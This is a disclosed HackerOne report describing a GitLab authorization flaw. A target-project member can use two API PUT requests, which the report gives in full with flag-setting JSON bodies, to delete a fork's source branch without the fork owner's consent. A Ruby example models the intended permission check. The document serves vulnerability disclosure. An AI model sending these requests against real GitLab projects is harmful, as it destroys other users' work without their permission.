Able to Delete Source Branch of MR

HackerOne report #633386 by ngalog on 2019-07-02, assigned to estrike:

Summary

For every MR from a fork project to the original project, there are two groups of people who can make changes:

  1. The MR author, i.e. fork project developer/maintainer
  2. The MR target project's developer/maintainer, i.e. original project developer/maintainer

Normally, people in group 1 are only able to change the MR's metadata, such as the title, the description, and "remove source branch after merge", but not labels, milestones, etc.

People in group 2 are only able to change the MR's labels, milestones, "merge when pipeline succeeds", etc., but not "remove source branch after merge".

I found that a member of the original project is able to change the "remove source branch after merge" setting through the GitLab API, which is not possible in the GitLab UI.

Impact

An MR target project member could delete the source project's branch without the source project's consent or proper permission.

Steps to reproduce

  • As user A, create a public project with a random name such as projectZero.
  • As user B, fork projectZero, create a new file, then create a new branch, then submit an MR to projectZero. Make sure "Delete source branch when merge request is accepted." is UNCHECKED.
  • As user A, prepare your GitLab API-scope token and issue the two requests below.

    First, update the MR's source-branch removal flags (the Content-Length matches the 98-byte JSON body):

    PUT /api/v4/projects/:project_id_of_original_project/merge_requests/:mr_iid HTTP/1.1
    Host: gitlab.com
    private-token: YOUR_TOKEN
    Content-Length: 98
    content-type: application/json

    {"should_remove_source_branch":true,"remove_source_branch":true,"force_remove_source_branch":true}

    Then accept the MR with the same flags:

    PUT /api/v4/projects/:project_id_of_original_project/merge_requests/:mr_iid/merge HTTP/1.1
    Host: gitlab.com
    private-token: YOUR_TOKEN
    Content-Length: 98
    content-type: application/json

    {"should_remove_source_branch":true,"remove_source_branch":true,"force_remove_source_branch":true}

  • Then, as user B, you should notice your MR source branch has been removed without your consent.
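The authorization rule the report implies the API should enforce, modelled as an added Ruby example (not GitLab's own code): the source-branch removal parameters are only honoured when the caller has write access on the source project, regardless of their role on the target project. The project, role and parameter names below are constructed for the illustration.

```ruby
# Hypothetical model of MR update authorization (example code, not GitLab's implementation).
ROLE_RANK = { guest: 10, reporter: 20, developer: 30, maintainer: 40 }.freeze

Project      = Struct.new(:id, :members)                     # members: { username => role }
MergeRequest = Struct.new(:iid, :source_project, :target_project, :author)

# Parameters that, if accepted, lead to a branch in the *source* project being deleted.
SOURCE_BRANCH_PARAMS = %w[remove_source_branch should_remove_source_branch force_remove_source_branch].freeze

def role_at_least?(project, user, role)
  rank = ROLE_RANK[project.members[user]]
  !rank.nil? && rank >= ROLE_RANK[role]
end

# Title, labels, milestones etc.: the author or a target-project developer may update.
def can_update_mr?(user, mr)
  mr.author == user || role_at_least?(mr.target_project, user, :developer)
end

# Deleting the source branch touches the source project, so the check must be
# write access there, not membership of the target project.
def can_remove_source_branch?(user, mr)
  role_at_least?(mr.source_project, user, :developer)
end

# Returns [honoured_params, rejected_keys]; raises when the caller may not update at all.
def filter_update_params(user, mr, params)
  raise ArgumentError, "forbidden" unless can_update_mr?(user, mr)
  rejected = params.keys.select { |k| SOURCE_BRANCH_PARAMS.include?(k) && !can_remove_source_branch?(user, mr) }
  [params.reject { |k, _| rejected.include?(k) }, rejected]
end

# Constructed scenario mirroring the report: A owns the target, B owns the fork and authored the MR.
def report_scenario
  target = Project.new(1, { "userA" => :maintainer })
  fork   = Project.new(2, { "userB" => :maintainer })
  mr     = MergeRequest.new(7, fork, target, "userB")
  params = { "title" => "t", "remove_source_branch" => true, "should_remove_source_branch" => true }
  { a: filter_update_params("userA", mr, params), b: filter_update_params("userB", mr, params) }
end
```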

Examples

Reproducible on gitlab.com.

Impact

The MR source branch could be deleted by a target project member without proper authorization or permission.

Edited Nov 04, 2019 by GitLab SecurityBot